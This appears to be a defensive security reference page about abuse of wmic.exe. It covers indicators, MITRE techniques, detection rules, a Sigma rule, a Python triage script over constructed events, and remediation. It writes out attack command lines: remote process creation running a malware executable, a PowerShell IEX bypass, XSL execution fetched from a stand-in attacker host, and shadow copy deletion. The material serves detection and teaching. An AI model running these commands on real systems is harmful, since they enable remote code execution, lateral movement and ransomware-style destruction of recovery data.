wmic.exe - WMI Command Line Security Analysis (System Utility)
wmic.exe is the **WMI command-line interface** providing access to Windows Management Instrumentation. It is a **powerful LOLBin** used for **remote code execution**, **lateral movement**, **reconnaissance**, and **defense evasion**. While deprecated, wmic.exe remains highly abused in attack chains.
Risk Summary
CRITICAL priority for SOC triage. wmic.exe is a versatile LOLBin for execution, recon, and lateral movement. Commands like "process call create", "/node:", and custom XSL stylesheets passed to "/format:" are **strong indicators of malicious activity**. Note: Deprecated since Windows 10 21H1 but still present on most Windows 10 systems; on recent Windows 11 builds it is an optional Feature on Demand, so check whether it is installed at all before writing it off.
Overview
What is wmic.exe?
wmic.exe is the command-line interface for Windows Management Instrumentation. It translates its own alias syntax (wmic os, wmic process, ...) or raw WQL into WMI queries and method calls, either locally or, with /node:, against remote hosts over DCOM/RPC (TCP 135 plus a dynamic port).
Core Functions
WMI Operations:
- System information queries
- Process management
- Remote system management
- Hardware/software inventory
Security Significance
- LOLBin Status: Extensive abuse capabilities
- Remote Execution: Execute code on remote systems
- Recon Tool: System enumeration
- Deprecated: Still present, still abused
Note: wmic.exe is deprecated in Windows 10 21H1+ and is an optional Feature on Demand (not installed by default) on recent Windows 11 builds. Deprecation does not stop attackers: wherever the binary is present it works exactly as before.
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\wbem\WMIC.exe |
| Parent | cmd.exe, powershell.exe |
| User | Any interactive user for local queries; administrative credentials are needed for remote (/node:) use |
| Context | System administration |
Legitimate Usage
wmic os get caption
wmic computersystem get model
Common Locations
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\SysWOW64\wbem\WMIC.exe
Suspicious Indicators
Legitimate vs Suspicious
LEGITIMATE
Command: wmic os get caption
wmic computersystem list
Context: System inventory
SUSPICIOUS
Command: wmic process call create "cmd /c ..."
wmic /node:TARGET ...
wmic os get /format:"<path, UNC share or URL to a custom .xsl>"
Context: Process creation
Remote execution
XSL stylesheet abuse
High-Risk Commands
| Command | Risk | Purpose |
|---|---|---|
| process call create | CRITICAL | Execute code |
| /node: | CRITICAL | Remote execution |
| /format: with a custom .xsl (path, UNC share or URL) | CRITICAL | Code execution; built-in formats such as list, csv, table, hform, htable, xml are benign output options |
| shadowcopy delete | HIGH | Ransomware indicator |
Abuse Techniques
Attack Techniques
Technique #1: Local Process Creation (T1047)
wmic process call create "powershell -ep bypass -c IEX(...)"
Technique #2: Remote Execution (T1047)
wmic /node:TARGET /user:admin /password:pass process call create "cmd /c C:\malware.exe"
Technique #3: XSL Script Execution (T1220)
wmic os get /format:"http://attacker.com/malicious.xsl"
Technique #4: Reconnaissance (T1082 System Information Discovery; qfe/product also map to T1518 Software Discovery, useraccount to T1087 Account Discovery)
wmic qfe list
wmic product get name
wmic useraccount list
Technique #5: Inhibit System Recovery (T1490, Impact tactic; the ransomware precursor that destroys Volume Shadow Copies before encryption)
wmic shadowcopy delete
Detection Guidance
Detection Strategies
Priority #1: Process Creation
Process = "wmic.exe" AND
CommandLine CONTAINS "process call create"
→ ALERT: CRITICAL
Priority #2: Remote Node
Process = "wmic.exe" AND
CommandLine CONTAINS "/node:"
→ ALERT: CRITICAL - Remote WMI execution
Priority #3: XSL Abuse
Process = "wmic.exe" AND
CommandLine CONTAINS "/format:" AND
the /format: value is not a built-in format name (list, csv, table, hform, htable, xml, mof, rawxml, textvaluelist, texttablewsys), e.g. it contains "http", "\\", "/" or ".xsl"
→ ALERT: CRITICAL - XSL script execution
Priority #4: Target Side of Remote Execution
ParentImage = "WmiPrvSE.exe" AND
Image IN ["cmd.exe", "powershell.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"]
→ ALERT: HIGH - process spawned by the WMI provider host. wmic.exe never appears on the target of a /node: command, so Priority #2 only fires on the source host; this rule is what you see on the victim.
Sigma Rule:
title: WMIC Remote Process Creation
status: experimental
description: Detects wmic.exe creating a process on a remote host via /node: together with process call create (T1047)
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\WMIC.exe'
        CommandLine|contains|all:
            - '/node:'
            - 'process'
            - 'call'
            - 'create'
    condition: selection
falsepositives:
    - Legacy administrative scripts that still use wmic for remote management; baseline by source host and account
level: critical
tags:
    - attack.execution
    - attack.lateral_movement
    - attack.t1047
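The detection priorities and the Sigma rule above are easier to reason about when run over real-looking events. The following Python script is an added example (not part of the original page): it applies the four priorities, plus the shadow copy rule, to a handful of constructed process-creation events whose field names mirror Sysmon Event ID 1 / Security 4688 (Image, CommandLine, ParentImage). It also handles the two false-positive traps a naive rule hits: a built-in /format: name (list, csv, ...) is not XSL abuse, and the receiving host of a /node: command shows WmiPrvSE.exe spawning the child, never wmic.exe. The BUILTIN_FORMATS set is a partial list of the stock stylesheets in System32\wbem and is an assumption; the sample events, the target IP and the file names are constructed test data.

```python
"""Triage wmic.exe process-creation events (added example with constructed data)."""
import re
from dataclasses import dataclass

# Stock stylesheets shipped in %SystemRoot%\System32\wbem (partial list, an
# assumption of this example): any other /format: value is treated as custom XSL.
BUILTIN_FORMATS = {
    "list", "csv", "table", "hform", "htable", "xml", "mof",
    "rawxml", "textvaluelist", "texttablewsys",
}
SEVERITY_RANK = {"INFO": 0, "HIGH": 1, "CRITICAL": 2}

WMIC_IMAGE = re.compile(r"(?:^|[\\/])wmic(?:\.exe)?$", re.I)
# 'process call create' with anything (e.g. /nointeractive) in between.
PROCESS_CALL_CREATE = re.compile(r"\bprocess\b.*\bcall\b.*\bcreate\b", re.I)
NODE_SWITCH = re.compile(r"/node:\s*\"?([^\s\"]+)", re.I)
FORMAT_SWITCH = re.compile(r"/format:\s*\"?([^\s\"]+)", re.I)
SHADOWCOPY_DELETE = re.compile(r"\bshadowcopy\b.*\bdelete\b", re.I)
# Receiving side of 'wmic /node:TARGET process call create': the child is
# spawned by the WMI provider host, and wmic.exe never runs on TARGET.
WMIPRVSE_PARENT = re.compile(r"\\WmiPrvSE\.exe$", re.I)
SHELL_CHILD = re.compile(
    r"\\(?:cmd|powershell|pwsh|mshta|rundll32|regsvr32|wscript|cscript)\.exe$", re.I)


@dataclass
class Verdict:
    severity: str          # INFO, HIGH or CRITICAL
    reasons: list[str]


def triage_event(event: dict) -> Verdict:
    """Score one process-creation event; INFO means no rule fired."""
    image = event.get("Image", "")
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    findings: list[tuple[str, str]] = []

    if WMIC_IMAGE.search(image):
        if PROCESS_CALL_CREATE.search(cmd):
            findings.append(("CRITICAL", "process call create: code execution via WMI (T1047)"))
        node = NODE_SWITCH.search(cmd)
        if node:
            findings.append(("CRITICAL", f"/node: remote WMI target {node.group(1)}"))
        fmt = FORMAT_SWITCH.search(cmd)
        if fmt and fmt.group(1).lower() not in BUILTIN_FORMATS:
            findings.append(("CRITICAL", f"/format: custom stylesheet {fmt.group(1)} (T1220 XSL execution)"))
        if SHADOWCOPY_DELETE.search(cmd):
            findings.append(("HIGH", "shadowcopy delete: inhibit system recovery (T1490)"))
    elif WMIPRVSE_PARENT.search(parent) and SHELL_CHILD.search(image):
        findings.append(("HIGH", "shell spawned by WmiPrvSE.exe: target side of remote WMI execution"))

    severity = max((s for s, _ in findings), key=SEVERITY_RANK.__getitem__, default="INFO")
    return Verdict(severity, [why for _, why in findings])


def triage_all(events: list[dict]) -> list[Verdict]:
    return [triage_event(e) for e in events]


WMIC = r"C:\Windows\System32\wbem\WMIC.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": WMIC, "ParentImage": CMD, "CommandLine": "wmic os get caption"},
    {"Image": WMIC, "ParentImage": CMD,
     "CommandLine": r'wmic process call create "cmd /c whoami > C:\Users\Public\o.txt"'},
    {"Image": WMIC, "ParentImage": CMD,
     "CommandLine": r'wmic /node:"192.0.2.10" /user:corp\admin /password:*** process call create "cmd /c C:\malware.exe"'},
    {"Image": WMIC, "ParentImage": CMD,
     "CommandLine": 'wmic os get /format:"http://attacker.com/malicious.xsl"'},
    {"Image": WMIC, "ParentImage": CMD, "CommandLine": "wmic computersystem get model /format:list"},
    {"Image": CMD, "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"cmd /c C:\malware.exe"},
    {"Image": WMIC, "ParentImage": CMD, "CommandLine": "wmic shadowcopy delete"},
]

if __name__ == "__main__":
    for event, verdict in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        print(f"{verdict.severity:8} {event['CommandLine']}")
        for why in verdict.reasons:
            print(f"         - {why}")
```

Running the script prints one line per sample event: the two inventory queries (including the /format:list one) stay INFO, the local and remote "process call create" and the remote stylesheet come out CRITICAL, and the WmiPrvSE.exe-spawned shell and the shadow copy deletion come out HIGH. The remote case carries two reasons, which is what you want in a SOC queue: the /node: target host name is the pivot for the lateral-movement hunt.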
Remediation Steps
Protection and Remediation
Defense: Disable WMIC
On Windows 11, wmic.exe is an optional Feature on Demand and can be removed (it is deprecated anyway):
dism /Online /Remove-Capability /CapabilityName:WMIC~~~~
or, from PowerShell: Remove-WindowsCapability -Online -Name WMIC~~~~
On Windows 10 the binary is part of the base image and cannot be removed this way; block C:\Windows\System32\wbem\WMIC.exe (and the SysWOW64 copy) with an AppLocker or WDAC rule instead. In either case, verify that no inventory, deployment or monitoring scripts still depend on wmic before enforcing, and remember that removing wmic.exe does not remove WMI itself: PowerShell (Get-CimInstance, Invoke-CimMethod) offers the same capability.
Defense: Monitor WMI
Enable WMI activity logging and command-line capture:
- Microsoft-Windows-WMI-Activity/Operational (enable with: wevtutil sl Microsoft-Windows-WMI-Activity/Operational /e:true) records WMI provider activity and errors (Event IDs 5857-5861); 5861 captures permanent event subscriptions
- Process creation with the full command line: Sysmon Event ID 1, or Security Event ID 4688 with "Include command line in process creation events" enabled, since every rule above depends on the command line
- Sysmon Event IDs 19-21 for WMI event subscription persistence (same attack surface, different tool)
If Compromise Suspected
- Review wmic command line
- Check for remote connections
- Identify created processes
- Hunt for lateral movement
- Check shadow copies status
Investigation Checklist
- Review full command line
- Check for process creation
- Identify remote targets
- Check for XSL references
- Review spawned processes
- Check shadow copy status
- Hunt for lateral movement